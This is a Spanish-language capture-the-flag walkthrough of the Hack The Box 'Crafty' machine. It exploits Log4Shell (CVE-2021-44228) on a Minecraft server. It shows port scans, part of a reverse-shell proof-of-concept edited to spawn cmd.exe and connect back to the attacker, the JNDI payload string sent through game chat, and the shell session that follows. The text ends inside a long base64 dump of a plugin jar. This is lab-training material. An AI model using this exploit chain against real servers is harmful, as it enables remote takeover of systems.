Crafty

#easy #windows

https://app.hackthebox.com/machines/Crafty

Enumeración de puertos y servicios

sudo nmap -p- -sS --min-rate 5000 -Pn -n -vv 10.129.230.193 -oA allPorts

PORT      STATE SERVICE   REASON
80/tcp    open  http      syn-ack ttl 127
25565/tcp open  minecraft syn-ack ttl 127

echo -n $(cat allPorts.gnmap | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',') | xclip -sel clip

nmap -p 80,25565 -sCV -Pn -n -vv 10.129.230.193 -oA openPortsServicesVersion

PORT      STATE SERVICE   REASON          VERSION
80/tcp    open  http      syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://crafty.htb
|_http-server-header: Microsoft-IIS/10.0
25565/tcp open  minecraft syn-ack ttl 127 Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 0/100)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

echo '10.129.230.193 crafty.htb' | sudo tee -a /etc/hosts

http://crafty.htb/

Googlear minecraft 1.16 5 vulnerability

https://software-sinner.medium.com/exploiting-minecraft-servers-log4j-ddac7de10847

Descargar https://tlauncher.org/en/

unzip TLauncher.v16.zip
Archive:  TLauncher.v16.zip
  inflating: TLauncher.jar           
  inflating: README-EN.txt           
  inflating: README-RUS.txt

java -jar TLauncher.jar

java -jar TLauncher.jar

https://github.com/kozmer/log4j-shell-poc

git clone https://github.com/kozmer/log4j-shell-poc

Modificar la línea que contiene String cmd="/bin/sh"; del archivo poc.py por String cmd="cmd.exe";

#!/usr/bin/env python3

import argparse
from colorama import Fore, init
import subprocess
import threading
from pathlib import Path
import os
from http.server import HTTPServer, SimpleHTTPRequestHandler

CUR_FOLDER = Path(__file__).parent.resolve()


def generate_payload(userip: str, lport: int) -> None:
    program = """
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class Exploit {

    public Exploit() throws Exception {
        String host="%s";
        int port=%d;
        String cmd="cmd.exe";
        Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
        Socket s=new Socket(host,port);

Nos ponemos en escucha en nuestra máquina atacante para recibir la reverse shell

nc -lnvp 1111
listening on [any] 1111 ...

cd log4j-shell-poc
python3 -m venv .
source bin/activate
python3 -m pip install -r requirements.txt
Collecting colorama (from -r requirements.txt (line 1))
  Using cached colorama-0.4.6-py2.py3-none-any.whl.metadata (17 kB)
Collecting argparse (from -r requirements.txt (line 2))
  Using cached argparse-1.4.0-py2.py3-none-any.whl.metadata (2.8 kB)
Using cached colorama-0.4.6-py2.py3-none-any.whl (25 kB)
Using cached argparse-1.4.0-py2.py3-none-any.whl (23 kB)
Installing collected packages: argparse, colorama
Successfully installed argparse-1.4.0 colorama-0.4.6

https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html

Hay que registrarse e iniciar sesión para descargar el archivo necesario, y descargarlo en el mismo directorio que el poc.py

https://download.oracle.com/otn/java/jdk/8u20-b26/jdk-8u20-linux-x64.tar.gz

tar -xf jdk-8u20-linux-x64.tar.gz

python3 poc.py --userip 10.10.14.207 --webport 80 --lport 1111

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up LDAP server

[+] Send me: ${jndi:ldap://10.10.14.207:1389/a}

[+] Starting Webserver on port 80 http://0.0.0.0:80
Listening on 0.0.0.0:1389

Dentro del juego presionar la tecla T e ingresar

${jndi:ldap://10.10.14.207:1389/a}

nc -lnvp 1111
listening on [any] 1111 ...
connect to [10.10.14.207] from (UNKNOWN) [10.129.85.30] 49681
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\users\svc_minecraft\server>cd ..
cd ..

c:\Users\svc_minecraft>cd Desktop
cd Desktop

c:\Users\svc_minecraft\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is C419-63F6

 Directory of c:\Users\svc_minecraft\Desktop

02/05/2024  07:02 AM    <DIR>          .
02/05/2024  07:02 AM    <DIR>          ..
10/07/2025  09:48 AM                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,676,450,816 bytes free

c:\Users\svc_minecraft\Desktop>type user.txt
type user.txt

User flag

5a02************************8140

c:\Users\svc_minecraft\Desktop>cd ..\server
cd ..\server

c:\Users\svc_minecraft\server>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is C419-63F6

 Directory of c:\Users\svc_minecraft\server

10/26/2023  06:37 PM    <DIR>          .
10/26/2023  06:37 PM    <DIR>          ..
11/14/2023  11:00 PM                 2 banned-ips.json
11/14/2023  11:00 PM                 2 banned-players.json
10/24/2023  01:48 PM               183 eula.txt
10/07/2025  09:48 AM    <DIR>          logs
11/15/2023  12:22 AM                 2 ops.json
10/27/2023  02:48 PM    <DIR>          plugins
10/24/2023  01:43 PM        37,962,360 server.jar
11/14/2023  11:00 PM             1,130 server.properties
10/07/2025  09:56 AM               105 usercache.json
10/24/2023  01:51 PM                 2 whitelist.json
10/07/2025  10:05 AM    <DIR>          world
               8 File(s)     37,963,786 bytes
               5 Dir(s)   3,901,386,752 bytes free

c:\Users\svc_minecraft\server>cd plugins
cd plugins

c:\Users\svc_minecraft\server\plugins>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is C419-63F6

 Directory of c:\Users\svc_minecraft\server\plugins

10/27/2023  02:48 PM    <DIR>          .
10/27/2023  02:48 PM    <DIR>          ..
10/27/2023  02:48 PM             9,996 playercounter-1.0-SNAPSHOT.jar
               1 File(s)          9,996 bytes
               2 Dir(s)   3,901,386,752 bytes free

c:\Users\svc_minecraft\server\plugins>powershell.exe
powershell.exe
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\svc_minecraft\server\plugins> [Convert]::ToBase64String((Get-Content -path "C:\Users\svc_minecraft\server\plugins\playercounter-1.0-SNAPSHOT.jar" -Encoding byte))
[Convert]::ToBase64String((Get-Content -path "C:\Users\svc_minecraft\server\plugins\playercounter-1.0-SNAPSHOT.jar" -Encoding byte))
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